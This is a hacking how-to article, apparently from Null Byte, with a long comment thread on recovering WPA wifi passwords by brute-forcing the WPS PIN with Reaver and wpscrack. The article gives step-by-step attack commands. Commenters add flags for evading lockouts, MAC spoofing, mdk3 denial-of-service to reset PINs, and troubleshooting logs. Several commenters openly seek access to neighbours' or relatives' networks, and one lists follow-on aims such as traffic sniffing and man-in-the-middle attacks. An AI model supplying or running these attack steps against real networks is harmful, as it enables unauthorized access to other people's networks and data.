How To: Hack WPA WiFi Passwords by Cracking the WPS PIN

Hack WPA WiFi Passwords by Cracking the WPS PIN

A flaw in WPS (WiFi Protected Setup), known to TNS for over a year, has finally been exploited with proof-of-concept code. Both TNS, who discovered the flaw, and Stefan at .braindump have released programs, "reaver" and "wpscrack" respectively, that exploit the WPS vulnerability. With this exploit, the WPA password is recovered in plain text the moment the WPS PIN attack against the access point succeeds, and that attack normally takes 2-10 hours (depending on which program you use).

This exploit defeats WPS with an intelligent brute-force attack on the static WPS PIN. When a PIN is guessed, the router actually reports whether the first four digits (of eight) are correct, and the final digit is a checksum computed from the other digits. This can be exploited to brute-force the WPS PIN and recover the WPA password in an incredibly short amount of time, compared with the standard attack on WPA.

In this Null Byte, let's go over how to use both tools to crack WPS. As of yet, no router is safe from this attack, and none of the vendors have reacted by releasing firmware with mitigations in place. Even disabling WPS still allows this attack on most routers.

Requirements

  • A computer (or virtual machine) running Kali Linux OS. If you're a beginner, you can start with our Kali Pi build based on the $35 Raspberry Pi, which we go over in detail here.
  • A router at home with WPS
  • A Wireless Network Adapter capable of monitor mode and packet injection. Confused? Check out our 2017 guide here, or you can get started with our most popular long range and short range adapters for beginners.
  • The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev

Tools

  • Reaver (support for all routers)
  • wpscrack (faster, but only support for major router brands)

Crack WPS

Each bulleted line under a step is a terminal command.

Follow the guide that corresponds to the tool that you chose to use below.

Reaver

  1. Extract Reaver.
  • tar -xzvf reaver-1.3.tar.gz
  2. Change to the Reaver directory.
  • cd reaver-1.3
  3. Configure, compile and install the application.
  • ./configure && make && sudo make install
  4. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
  • sudo iwlist wlan0 scan
  5. Set your device into monitor mode.
  • sudo airmon-ng start wlan0
  6. Run the tool against an access point.
  • reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
  7. Wait until it finishes.

This tool makes it too easy.

wpscrack.py

  1. Make the program executable.
  • chmod +x wpscrack.py
  2. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
  • sudo iwlist wlan0 scan
  3. Get your own MAC address and save it for later.
  • ip link show wlan0 | awk '/ether/ {print $2}'
  4. Set your device into monitor mode.
  • sudo airmon-ng start wlan0
  5. Attack your AP.
  • ./wpscrack.py --iface mon0 --client <your MAC, because you're attacking yourself, right?> --bssid <AP MAC address> --ssid <name of your AP> -v
  6. Await victory.

Now, let's hope we see a lot of firmware update action going on in the near future, or else a lot of places are in a whole world of trouble.


Cover image via thehackernews

96 Comments

I'm a little confused; in the first line of code, do you mean "reaper" or "reaver"?

The software is actually Reaver, not Reaper.

Software lol reaver is only a script

please tell me any locked wifi passcode.

God has recreated humanity to perfection again as it was before Adam's disobedience...would you want to recreated today?

its simple as believing that Jesus died on that cross for you and confessing that from your heart!

Hi, thanks for this tutorial. However, just download Backtrack 5 r3, which comes with REAVER and EasyCreds installed; it'll save you a lot of time and nerves installing those programs! LOL

Have fun

i wanna hack a wifi password (WPA), plz plz help me, i dont have net in my home :/ plz

Mehdi:

I will be running tutorials on cracking WPA and WPA2 using aircrack-ng next week .

OTW

sudo iwlist scan wlan0
iwlist: unkwown command 'wlan0' (check 'iwlist --help').

any help with this problem? thanks

it tells you to check iwlist help )))
you need to type
sudo iwlist wlan0 scanning
instead

I get:
"wlan0 Interface doesn't support scanning."

I suppose your wifi interface does not support monitor mode..

It says that your wifi interface card is not detected or has another name. Just type *ifconfig* and press enter, note the name of your wifi interface, and then run the command replacing wlan0 with the name of your wifi card.

Did you install reaver?

OTW

i did install reaver and all that was asked to be installed in the tutorial...thanks

OK. Are you in the right directory? Is your wireless interface named wlan0 (it could be wlan1)? Check by typing iwconfig.

OTW

sorry OTW..what do you mean by the right directory? you mean i should be in the reaver directory before typing sudo iwlist scan wlan0 ? I don't get it..kindly explain well thanks

Mike:

It looks like the author of this article made a typo. Surprised no one caught it before now. The command should be;

sudo iwlist wlan0 scan

OTW

hahaha interesting :D are you not the author ? OccupyTW??? LOL :) anyway thanks a lot...imma try it now

anyway, now it is scanning fine after correcting that typo...but after i do the attack on my wifi...sudo reaver -i mon0 -b XX:XX:XX:FF:DD:DD -vv ..all i get is ..

waiting for beacon from XX:XX:XX:FF:DD
switching mon0 to channel 1
Associated with XX:XX:XX:FF:DD (ESSID: somename)

and thats it... only three lines and it stops there with the cursor blinking..I am imagining that reaver is working, trying to find me the password, but it is kinda strange just sitting here watching the cursor blinking waiting for magic...tell me if this is normal...or did i do something wrong again?

Is it possible to crack fast if i already know the WPS number?
And also, is it possible to crack if WPS is disabled?

Yes, If you know the WPS pin then you can get results in seconds

reaver -i mon0 -b <targetmac> -vv --pin <wpspinhere>

ok so i got reaver working fine...after two days of waiting patiently..(aargghhh) ..now reaver gets locked up at 90.90%...repeating the same pin over and over again...throughout the whole night...was thinking it was a network signal problem..so i got the network signal to go up...and reaver was testing each pin at 5 seconds/pin (not bad) but unfortunately it kept on repeating the same pin ...

been checking on other forums and it seems am not the only one having that problem...but nobody has suggested a solution...

master OTW...do you have a solution? anybody got a solution?
I'm using reaver on kali...someone was talking about the new version of reaver having a bug or something...help pls...

bro i too had the same problem, it got stuck on 90.90%.....stuck on the same pin like 99995867. i waited for 24 hours and this is what i get in the end.

so plz if you find the solution or what the problem might had been let me know


how can i download it !! i download the reaver zip file, then when i extract it, it shows 2 files, none of which is an install prog. !! heeelp

Eng:

Are you using Windows or Linux?

OTW

my router has rate limiting (ap rate limiting wait 60sec)
is there a way to crack these kind of routers
and also one of my test runs got stuck on 90.90% after checking all the pins (99995867). what do u think is the problem......

I'm running in to the same issue. I'm assuming that all new routers now have this protection feature. From what I'm seeing, we should still be able to gain access to the PIN but it is going to take a lot longer (considering we are having to wait a minute between each attempt basically).

As far as a work around, I'm racking my brain and can't really think of any for this type of attack. Perhaps someone with more experience could give us some insight.

I'll probably end up doing an "Evil Twin" attack. It's the only type I haven't attempted yet and seems very clever :)

hi,

I tried with Reaver on BackTrack; after 24h and 33% accomplished, it tells me: didn't manage to identify with BSSID *****

I stop and rescan with wash -i mon0, but the BSSID in question doesn't appear in the list, whereas with airodump-ng mon0 it appears.

(haven't tried with iwlist wlan0 scan yet)

Any idea ?
thanks

is that possible without linux os?

No, you really need to use Linux. Get one of the hacking Linux distributions like BackTrack or Kali, among others.

OTW

I typed sudo airmon-ng start wlan0 but I got this sudo: airmon-ng: command not found

Any help with this?, thanks.

Daniel:

Welcome to Null Byte!

Are you using BackTrack? If not, do you have aircrack-ng?

OTW

i have pin code, mac, bssid, and SSID of a wifi. please give me the easiest way to hack wifi; am a new user, dont know how to hack using Windows 8. any one plz

Atlas:

Welcome to Null Byte!

As for hacking wifi with Windows 8, you have a few options. Aircrack-ng has a Windows version, but I can't vouch for its effectiveness. Cain and Abel runs on Windows and is an excellent wifi cracking tool, but you need to buy a special wireless card that runs hundreds of dollars.

My recommendation is that you invest a bit of time and learn Linux. Most hacking tools are designed for Linux and most hackers use Linux for a number of very good reasons. I have 13 tutorials here on Null Byte on the basics of Linux for new hackers.

OTW

thank you for your reply. I'm a simple user of the internet, dont know much about Linux. is it possible to use Windows 8 and Linux on the same pc?

here we dont have Linux, how can i download it and from where?
does it cost my pc data which i have now?
one other question: when i have pincode, ssid, bssid and mac number,
how long will it take to hack the wifi?

okay i got everything about Linux, all from the Ubuntu web site.
at least tell me now how long it will take when i know a wifi's ssid, bssid, mac and pincode number?
plz plz rply

Easiest way is download kali linux 32x from offensive security as an iso. Burn it and run it as a live boot disk. The default user is root and the password is toor. Once it boots, open terminal and type wifite. That will be a gui tool; the rest is automatic. Both wps and wep can be hacked easily. However many new routers have received firmware updates to block this method of attack so dont be expecting this to work. Finally if your wireless card does not support monitor mode then ur going to need to get a usb antenna; may i suggest a signalking antenna. If you get it working then well done, u have completed ur first task. If ur really good then use sdr to hack mobile phone calls. Both and more are very easy with kali linux. Most facebook viruses are made from the social engineering toolkit from kali. But reading is one thing. Actually doing it will land you in jail. Soo dont cry if you end up on the end of blacks willy. Happy hunting. :)

OK, I have a question and I am a newbie in this. Do you need a dictionary in this attack, and does this work for WPA keys also?

No dictionary. This attack finds an 8-digit pin number that can be used to acquire a password. Because the routers are dumb and give you check sums and stuff, the number of pins you need to check is reduced to a few thousand.

master otw:

how can i know that our victims router is using wps or not????
and reaver is a part of backtrack5 or we need to download reaver???

I know this was a long time ago, so not sure if you still need this info (or are even active), but there are at least 2 ways to do this that I know of.

It can be done in the terminal using a command like wash -i or something like that. Sorry I don't have the exact command for you, but honestly I'm tired and I can't remember. (Hopefully you can manage to google this yourself though)

The second and noob way (I may catch some flak by giving you this cheat but you seem like the kind of person that wants it the easy way, no offense), is to access the Fern wifi cracker in your Kali tools. When you scan for AP's it will show you whether they support WPS or not. I wouldn't count on this GUI as being 100% accurate though but it is a good place to start.

As far as using fern to crack the password, I think you would be much better off using aircrack or reaver in the terminal. Fern is just basically a GUI of aircrack in my opinion, but using it will rob you of the command line practice we all need.

Hope this helped (sorry if I sounded rude, wasn't my intent)

How can i hack someone's wifi if i know their wps pin? Previously i hacked my brother's wifi and i also managed to gain access to the router and i noted the wps pin. then for some reason he changed the password; now i dont want to waste my 6 hours. can it be shorter if i know the wps pin?

Please tell me whether this can be done in mac os (apple). If yes , how..?? (Same procedure or something else)

Yes
Same procedure + Live DVD or VM or Convert to Linux or Ask The owner for access.

Can I crack wpa without a router,just a laptop ?I have linux loaded on my windows laptop,just have to reboot and start in linux

yes, you just need Kali and Reaver. No router necessary

thanks for the quick info,got a couple more for you though,lol.Any links to a tut on how,everyone i seen tells you to must have a router of your own to start. I loaded linux on my system but it seems to hang when i reboot so I made it reboot form a usb drive,how do I get it off my system now? thanks

Eve:

The WPA2 hacking tutorials here at Null Byte don't require you use a router. Check this one out.

OTW

They may be referring to the fact you need a router on your network to try this. ;-p

thanks so I have to set up a VM to load Kali Linux on first ,right?Then run Cowpatty from there.

Yes. Or you can run it as a dual boot system.

guys got vm installed but had no option for a windows 7 64 bit so i went with the 32 bit option,is that ok? I downloaded Kali iso.

yes, but it will be slower.

so i got the Kali iso loaded on a usb stick. it says to reboot now and select the usb option to boot from when my laptop starts....problem, there is no reboot from usb option in the start up screen on my laptop. All that is there is windows 7 and a previous attempt to load backtrack that I can't seem to remove, damian or something like that. Any ideas on what i can do?

sorry, I am new at this. how do I get there? also, how do I get rid of the other option that's there now that never installed right? BTW I wrote the Kali iso to the usb with unetbootin, so that should have made the usb bootable, right?

Reboot PC hit either DEL or Enter depending on MB enter bios and find boot order.

Ok guys, got the boot order changed to USB flash drive, rebooted several times with the Kali ISO loaded on the stick through unetbootin, but it still won't boot from the USB drive. Did I miss something?

ok got it loaded on the usb stick. it booted and started to install Kali linux but stops on "detecting network hardware" and goes no further. any ideas please? I have no hardware, just a laptop trying to hack next door's wireless.

Believe me it is not only, always, between 2-10 hours
I know what i'm talking about lol

I've spent a 32 hours waiting and "Passphrase not in dictionnary"

Because most passphrases nowadays are 14-26 chars long, all random alphanumeric. You may get lucky with a word list.. Avg crack time on a non-GPU cluster is about 195 years. I hash at 105k and it makes no difference.

195 years too much for me, i finally get it by the other way SE

hello. I have a problem with reaver, and this is my problem...

can any 1 help me plz ...

add -d 0 -l 420 to reaver argument. Spoof the MAC of mon0 as well. Pretty sure you are dealing with new firmware on the AP.

So chances are slim to none for successful pin harvest.

But you can blast it with mdk3. It may reset the pin if it doesn't DoS freeze the AP and req admin reboot. However in my experience mdk3 pin reset only works against TKIP AP's.

Side note:
This is a TP-Link AP yes?
reaver 1.5? really? Like to look at the code.

Just a personal experience that might be interesting to share, though I don't know if someone has already said this: according to Reaver version 1.4, the arguments --dh-small and -d 0 almost halve the time spent. Theoretically (correct me if I'm wrong) there are 40.320 combinations. My results are 2 seconds/pin, almost 1800 pins per hour (fails excluded).

So with my test AP it would take 22,4 hours to complete the process, let's assume we have it at half, a pretty good result I'd say. But I heard of better performances, is it possible to speed the process up even more?

EDIT: see Cyber's reply, this is totally wrong.

Greetings, CIUFFY.
An 8 digit pin using 0-9 = 10 to the 8th possible combinations (100,000,000).

However since the 8th digit isn't part of the pin it is just a check sum of the other 7, total = 10 to the 7th (10,000,000).

However WPS presents the pin in two halves for verification. So if one half of 4 digits are correct it will just work on the other half of 4.

Don't forget the second half has one space for a check sum, so really it's just 3 digits in the second half.

The correct total for WPS (10 to the 4th + 10 to the 3rd = 11,000). So the first half has 10,000 possible combinations and the second half has just 1,000.

Short keys (--dh-small,-S) will speed it up. My lab gives me 22-90 secs a pin on updated firmware routers. 2-3 seconds on old firmware.

Also, things to note: even though the router says locked or no WPS, hit it anyway (-L) to vet that, because my recent tests show they are unlocked yet flagging locked.

What I used last..

"reaver -i monx -a -S -N -E -b xx:xx:xx:xx:xx:xx -vv -d 3 # -r 2:199 # if you are getting locked out too much add that it may help"

-a Auto select some advanced features.

-S Use small Diffie-Hellman keys (reduces strain on the router & increases speed).

-N No nacks, just speeds things up a bit.

-E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.

-d The default delay period between pin attempts is 1 second.

-r Recurring delay. Sleep for y number of seconds every x pin attempts.
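The checksum rule and the two-half count explained above, worked through in Python as an added example (not code from the article, from Reaver or from any commenter). The digit weighting is the one from the WPS specification; the sample PIN is the default one quoted elsewhere in these comments.

```python
# Added illustration of the WPS PIN arithmetic discussed above; not code from
# the article or from Reaver/wpscrack. The weighting is the WPS spec rule:
# digits at odd positions count 3x, even positions 1x, and the 8th digit is
# chosen so the weighted sum is a multiple of 10.

def wps_checksum_digit(first_seven: str) -> int:
    """Return the 8th (checksum) digit for the first seven PIN digits."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first_seven))
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 decimal digits whose last digit is the checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum_digit(pin[:7])


def valid_second_halves(first_half: str) -> int:
    """Count the 4-digit second halves that complete a checksum-valid PIN
    for a fixed first half. Only 3 of the 4 digits are free, so this is 1000."""
    return sum(1 for n in range(10_000) if is_valid_wps_pin(first_half + f"{n:04d}"))


def worst_case_attempts() -> int:
    """Worst-case guesses when the AP confirms each half separately:
    every first half (10^4) plus every checksum-valid second half (10^3)."""
    return 10_000 + valid_second_halves("0000")


if __name__ == "__main__":
    # 12345670 is the default PIN quoted in the comments above.
    print("12345670 valid:", is_valid_wps_pin("12345670"))        # True
    print("worst case with split halves:", worst_case_attempts())  # 11000
```

Without the half-by-half confirmation, only the checksum helps, leaving 10^7 valid PINs; the split is what brings the worst case down to 11,000.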

Thank you for the clarifications, I really messed up with the calculations there, I didn't think about the other possible digits (0-9), whoops. Also, I didn't know about the two halves of verification, so really thank you for the clarification.

So, it means that the amount of combinations is actually 4 times lower than I calculated? Which brings amazing performance (according to my very outdated router).

Thank you again!

No worries, Yeap you are running at speeds that I wish still was the norm. Most new routers do not play nice with reaver anymore.

i have a question, in reaver when it tries the wps pins, i have an app that it can get me the router's pin without connecting to it, is there a way to enter that pin with reaver? or is there a difference between the pin i get and the pin that reaver tries?

thank you :)

having problem with reaver

reaver -i mon0 -b EC:22:80:*:*:* -a -S -c 10 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 10
[+] Restored previous session
[+] Waiting for beacon from EC:22:80:8B:19:CD
[+] Associated with EC:22:80:8B:19:CD (ESSID: **)
[+] Trying pin 12340064
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

can any one help!!

I encounter reaver keeps trying pin 12345670 over and over again for more than 2 days, using an Alfa AWUS036H USB wireless adapter.
pls. help.

I observed 3 notable failed transactions.....

[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670

steps that I had used

airmon-ng
airmon-ng start wlan0
wash -i mon0
reaver -i mon0 -b 34:08:04:6F:0F:B0 -vv

Happy New Year to all Null Byte ......appreciate some help on the hacking issue I am facing.

Sorry if nobody answered, maybe someone thought you might have found the way out yourself.

As far as I can tell, this is a signal strength issue, and this is the most common reason on google for error 0x02 (and 0x03 also; strange that it is returning different errors, which however are usually connected to the same issue).

Are you sure the AP is vulnerable? Try the command suggested by CyberHitchHiker above.

I was told that DLink DIR 615 has new firmware 7.17 that blocks hacking.....is it true?

Hi, will it work with WPA2 WPS 1.0 or WPA WPS 1.0? My own TP-LINK auto locks WPS when I try to use the reaver 1.4 attack on WPS :(

Yes it will and if you can connect to the TP-Link you can run exploits against it cause TP-Link has issues.

WPS PIN: '44554484'
WPA PSK: 'd8294ce269dac37d7b45bbc640b2e11238f9cd194d3c591381c9c028e4dd321b'

Do you know why reaver is giving this hash WPA PSK key? Thank You.

It may be a stupid Question. But what do i have to do to connect to a network when i have the WPS pin? How can i actually connect using the WPS pin? Thanks!

I think you got the answer before because it's been a long time, but if not, then in this year 2020 you can use the jumpstart software or any other software for connecting to that network; then you will get the actual password

Hi all, when i try to crack the wps i'm stuck at this:
root@Kali:~# reaver -i wlan1mon -b (Address)

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6x <t6x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from (Address)

And it doesn't move for hours :(

Throw a -vv at the end and see why not?
I'll guess it's channel hopping and failing to associate.

i had to kill a process, one from the list that terminal give you when you put the interface in monitor mode

Hey all, i'm new here. i have a problem when i install Kali Linux as the basic system on my computer: it does not work. i start my computer and it tells me boot not installed, put in a disk and press any button

Thx for read
Pls , help me if u can

OK so I just went into Google, did a basic search for how to hack into a locked wifi connection, and this site came up first. So I've been reading this forum. My one question is I have a basic smartphone. It's powered by Android; the name of my phone is Alcatel One Touch. When I go into my wifi settings I can see about 7 available networks but they are all locked. How do I figure out their password? I do not have a computer or router of my own. Please someone give me simple direction, thanks

There are numerous articles here on Null Byte on breaking wifi passwords. I have an entire series on cracking wifi here.

hi there peeps!

I remember when REAVER, Bully and Pixie Dust came (approx 2,5 years ago it was implemented in Kali Linux's "wifite"), but their attacks are so old that manufacturers have patched most of it with the annoying WPS lockout by now, I'm afraid :)

People also do upgrade their equipment both with firmware and physically.. BUT if you think about it.. it is possible to spoof... GO figure it out; Kali tools are getting too outdated by now and "derv82", the author of wifite, has not been active in the community for some time and left Wifite2 unfinished already a couple of years ago.

Implementing MAC spoofing with macchanger would actually work on most manufacturers, because the access points don't/can't eventually lock out their real clients in a total lockdown anyway :) with that said, you/someone must add a macchanger routine to Wifite yourself :)

Best regards, kimocoder
Kali & NetHunter Developer & Sony Mobile & Playstation Developer

I'm really dumb when it comes to technology, so bear with me here. I'm just curious..what is the point in hacking someone's wifi? is it just to be abl2 use their wifi 4 free or is there more 2 it than that? if so what all can u do when u hack someones wifi? I realize this is a really old post btw but just accidentally came across it

It would all depend on your end game. If you needed free Wifi it would serve that purpose just fine. If you needed to create a MITM attack, scan for compromised routers, grab data off media servers, sniff traffic, watch CCTV, harvest information, hide yourself or prank someone it could all be possible.

This router attack rarely works anymore. Despite what the article says, most manufacturers have patched this vulnerability.

These days encryption keys are getting longer and harder to crack. A brute force attack would take an incredibly long time to succeed. Your attacking machine would probably be obsolete by then.

What does one gain from this quite labor intensive process? Free stolen wifi? Even in my little town free, open wifi is available throughout most of the area.

Hmm, outdated articles, which are often incorrect coupled with an abundance of ads which I never see (hint, ad away works fantastic)

This would appear to be another affiliate site. No harm in that. I've been an affiliate for several companies.
